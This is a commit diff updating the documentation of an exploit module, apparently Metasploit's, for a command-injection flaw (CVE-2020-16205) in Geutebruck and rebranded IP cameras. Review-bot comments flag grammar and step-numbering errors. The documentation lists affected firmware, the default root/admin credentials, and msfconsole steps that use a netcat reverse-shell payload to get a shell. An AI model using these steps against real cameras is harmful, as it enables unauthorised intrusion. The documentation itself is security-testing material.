Update geutebruck_testaction_exec.md

it should be better now :)
ddouhine 2020-08-13 16:02:18 +02:00 committed by gwillcox-r7
parent a14a2fe8d2
commit e4f760691e
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
1 changed files with 28 additions and 12 deletions

@ -1,6 +1,7 @@
## Vulnerable Application ## Vulnerable Application
[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
Encoder and E2 Series Camera models:
G-Code: G-Code:
EEC-2xxx EEC-2xxx
G-Cam: G-Cam:
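Review bot: The added opening sentence pairs a singular subject with a plural verb ("The web interface of the following ... products ... are concerned") and uses "limited versions" without saying what that means. Suggest something like "The web interface of the following Geutebruck products is affected when running firmware <= 1.12.0.25, or the 1.12.13.2 and 1.12.14.5 "limited versions":", with a short note on what a limited version is, so a reader can tell from the firmware string alone whether a device is in scope.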
@ -9,33 +10,48 @@ G-Cam:
ETHC-22xx ETHC-22xx
EWPC-22xx EWPC-22xx
Many brands use the same firmware:
UDP Technology (which is also the supplier of the firmware for the other vendors)
Ganz
Visualint
Cap
THRIVE Intelligence
Sophus
VCA
TripCorps
Sprinx Technologies
Smartec
Riva
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
### Description ### Description
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
Tested it with the 1.12.14.5 firmware only.
## Verification Steps ## Verification Steps
List the steps needed to make sure this thing works 1. Start the camera using default configuration
2. Launch msfconsole
1. Do: `use exploit/linux/http/geutebruck_testaction_exec` 3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
2. Do: `set httpusername root` 4. Do: `set httpusername root`
3. Do: `set httppassword admin` 5. Do: `set httppassword admin`
4. Do: `set lhost 192.168.14.1` 6. Do: `set lhost <metasploit_ip>`
5. Do: `set rhosts 192.168.14.58` 5. Do: `set rhosts <camera_ip>`
6. Do: `set payload cmd/unix/reverse_netcat_gaping` 6. Do: `set payload cmd/unix/reverse_netcat_gaping`
7. Do: `check` 7. Do: `check` to be sure the target is vulnerable
8. Do: `exploit` 8. Do: `exploit`
9. You should get a shell
## Options ## Options
### HTTPUSERNAME The default credentials to log on the web interface are root/admin.
### HTTPUSERNAME
A username used to authenticate on the admin page. **Default: root** A username used to authenticate on the admin page. **Default: root**
### HTTPPASSWORD ### HTTPPASSWORD
The password of the username used to authenticate on the admin page. **Default: admin** The password of the username used to authenticate on the admin page. **Default: admin**
## Scenarios ## Scenarios
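Review bot: In the Verification Steps list the new numbering runs 1 to 6 and then restarts at 5: `6. Do: set lhost <metasploit_ip>` is followed by `5. Do: set rhosts <camera_ip>`, so the steps from `set rhosts` onward should be renumbered 7 through 11. Two smaller points in the same hunk: the unchanged Description line still reads "This exploit a simple OS command injection" where "This exploits" is meant, and the sentence added under `## Options` about the root/admin default credentials repeats what the `**Default: root**` and `**Default: admin**` lines already state, so it could be dropped or moved next to the step that starts the camera with its default configuration.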